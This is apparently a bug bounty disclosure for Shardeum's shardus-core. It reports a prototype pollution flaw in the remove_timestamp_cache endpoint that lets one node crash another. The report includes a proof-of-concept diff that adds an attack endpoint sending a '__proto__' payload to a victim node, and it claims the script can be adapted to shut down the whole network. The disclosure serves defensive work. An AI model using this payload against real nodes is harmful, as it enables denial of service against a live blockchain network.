34476 - [BC - Critical] remove_timestamp_cache prototype pollution lead...

Submitted on Aug 13th 2024 at 18:17:14 UTC by @ZhouWu for Boost | Shardeum: Core

Report ID: #34476

Report type: Blockchain/DLT

Report severity: Critical

Target: https://github.com/shardeum/shardus-core/tree/dev


  • Network not being able to confirm new transactions (total network shutdown)



In the @shardus/core source code repo, node store a cache of transaction timstamp. Other node will ask the cache, if it's a miss the node will create new tx timestamp cache object derived from payload of the request. Subsequently there's another endpoint named remove_timestamp_cache , presumebly to remove these cache. This endpoint is referencing properties in object injection from the element in the payload from the request. Which make it vulnearble to prototype pollution


This happen due to referencing the object properties from the payload of the request directly when trying to remove the cache in remove_timestamp_cache endpoint. The code is as follows

if (this.txTimestampCache[cycleCounter] && this.txTimestampCache[cycleCounter][txId]) {

This way of referencing the cache object to assigned value is dangerous, because the referenced element come straight from the request payload. Consider the following payload

  cycleMarker: "rndmStr",
  cycleCounter: "__proto__",
  txId: "hasOwnProperty"

This mean that the cache object will be referenced in the following way


Essentially overwriting the prototype of the cache object, and the hasOwnProperty method of the cache object. This is problematic because hasOwnProperty is polluted to be a literal string which in turns break the code of the victim when object iteration or objection check operations are done later down the stream.

Proof of Concept

  • Launch a network of legit nodes.

  • Launch an attacker node with this patch applied to shardus/core

  • Wait for the attacker node to go active

diff --git a/src/utils/nestedCounters.ts b/src/utils/nestedCounters.ts
index 3ebbb782..5fbe9796 100644
--- a/src/utils/nestedCounters.ts
+++ b/src/utils/nestedCounters.ts
@@ -5,6 +5,11 @@ import Crypto from '../crypto'
 import { isDebugModeMiddleware, isDebugModeMiddlewareLow } from '../network/debugMiddleware'
 import { getNetworkTimeOffset, shardusGetTime } from '../network'
 import { Utils } from '@shardus/types'
+import { InternalRouteEnum } from '../types/enum/InternalRouteEnum'
+import { getTxTimestampReq, serializeGetTxTimestampReq } from '../types/GetTxTimestampReq'
+import { deserializeGetTxTimestampResp, getTxTimestampResp } from '../types/GetTxTimestampResp'
+import * as crypto from "crypto"

 type CounterMap = Map<string, CounterNode>
 interface CounterNode {
@@ -32,6 +37,30 @@ class NestedCounters {

   registerEndpoints(): void {
+    Context.network.registerExternalGet('launch-attk', async (req, res)=>{
+          const victim = req.query.victim as string
+          const node = Context.shardus.getNodeByPubKey(victim)
+          const cycleMarker = crypto.randomBytes(254).toString()
+          const cycleCounter = "__proto__"
+          const txId = "hashOwnProperty"
+          const payload = {
+            cycleMarker,
+            cycleCounter,
+            txId
+          }
+          const data = await Context.p2p.ask(node, "remove_timestamp_cache", payload, false)
+          res.send(data)
+    })
     Context.network.registerExternalGet('counts', isDebugModeMiddlewareLow, (req, res) => {

  • Send a request to the attacker node with the victim node pubkey as a query parameter

  • GET http://localhost:1337/launch-attk?victim=<publickey>

  • observe the logs, the node exit unCleanly, essentially killing the node.


This is pretty straightforward single node attack, the script can be modified to attack the whole network to kill the whole network.

Last updated

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